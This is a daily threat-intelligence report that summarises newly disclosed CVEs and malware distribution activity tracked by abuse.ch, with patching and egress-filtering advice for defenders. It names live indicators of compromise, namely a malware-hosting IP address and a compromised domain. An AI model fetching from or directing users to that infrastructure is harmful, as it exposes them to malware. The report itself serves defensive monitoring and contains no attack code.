The period from June 16-17, 2026 revealed significant vulnerability disclosures and sustained malware distribution activity. The National Vulnerability Database published 30 new CVEs, including two critical-severity vulnerabilities (CVE-2026-22313 with CVSS 9.1 and CVE-2026-53776 with CVSS 9.1) affecting network device management interfaces and JWT authentication systems. Multiple high-severity vulnerabilities were identified in OpenClaw (15 CVEs), stable-diffusion.cpp library, and enterprise infrastructure components, presenting immediate risk to organizations using these technologies.
Malware distribution infrastructure remained highly active with 51 malicious URLs catalogued by abuse.ch, dominated by Mozi botnet variants targeting IoT devices and ClearFake campaigns delivering fake browser updates. The majority of malicious payloads targeted MIPS and ARM architectures commonly found in routers, IP cameras, and embedded systems. Distribution infrastructure demonstrated geographic diversity with command-and-control servers hosted across Asia-Pacific and European networks.
Organizations should prioritize patching the two critical vulnerabilities, particularly CVE-2026-22313 (unauthenticated API access) and CVE-2026-53776 (JWT validation bypass). Network defenders should monitor for Mozi botnet indicators and implement egress filtering to block communication with known malicious domains. The absence of RSS articles and threat actor infrastructure seizures suggests a period of relative operational stability, though the volume of new vulnerabilities demands immediate attention from vulnerability management teams.
Two critical-severity CVEs and 28 high-severity vulnerabilities disclosed, affecting network devices, authentication systems, and development tools
Authenticated attackers can execute arbitrary OS commands with administrative privileges via REST API on management network. CVSS 9.1 critical severity.
Perry versions before 0.5.1166 unconditionally disable JWT expiration validation, allowing attackers to reuse expired tokens indefinitely. CVSS 9.1 critical severity.
Network device exposes REST API with constant authentication token, enabling unauthenticated access to system settings and command execution. CVSS 8.6 high severity.
Unsanitized DHCP reply strings in wicked dhcp client before 0.6.79 allow malicious DHCP servers to execute arbitrary code. CVSS 8.8 high severity.
Revoked paired device sessions can re-establish node token authority without renewed approval in OpenClaw before 2026.5.26. CVSS 8.8 high severity.
OpenClaw contains multiple environment variable injection flaws (CVE-2026-53858, CVE-2026-53842, CVE-2026-53846) allowing attackers to execute unintended executables via workspace .env files. CVSS 7.1 high severity.
Yeoman Environment versions 2.9.0-6.0.0 install missing generator packages from caller-supplied names without user confirmation. CVSS 8.6 high severity.
Publicly disclosed elevation of privilege vulnerability in Microsoft Malware Protection Engine, publicly referred to as 'RoguePlanet'. Microsoft working on security update. CVSS 7.8 high severity.
Three heap buffer overflow vulnerabilities (CVE-2026-47750, CVE-2026-47747, CVE-2026-47749) in pickle .ckpt parser enable arbitrary code execution via malicious files. CVSS 7.8 high severity.
Unauthenticated attackers can exploit integer overflow in Pacemaker's remote message decompression to cause memory corruption and denial of service. CVSS 8.6 high severity.
51 malicious URLs identified distributing Mozi botnet variants, ClearFake campaigns, and information stealers targeting IoT devices and end users
35+ URLs distributing Mozi botnet payloads targeting MIPS and ARM architectures in IoT devices (routers, cameras). Distribution from compromised devices across Asia-Pacific IP ranges (110.x, 115.x, 123.x networks).
3 URLs hosting PureLogStealer/PureLogsStealer information stealer malware on Cloudflare Workers domains and compromised infrastructure (vrdccbank.com). Credential theft capability.
Multiple Mirai botnet payloads (arm, mips, x86 architectures) and shell scripts hosted on single C2 IP address. Active exploitation targeting network devices and IoT platforms.
13 URLs identified serving ClearFake malware disguised as browser updates. Domains use varied TLDs (.xyz, .com, .bet, .shop, .games) to evade detection. Social engineering tactic targeting end users.
URLs on 91.92.242.236 distributing executables dropped by Amadey botnet loader. Multi-stage infection chain for secondary payload delivery.
Analysis of MITRE ATT&CK techniques observed in vulnerability disclosures and malware campaigns
New digital forensics and incident response resources published during the reporting period
Analysis and comparison of digital forensics case management and investigation tools as alternatives to TheHive platform. Relevant for incident response teams evaluating case tracking solutions.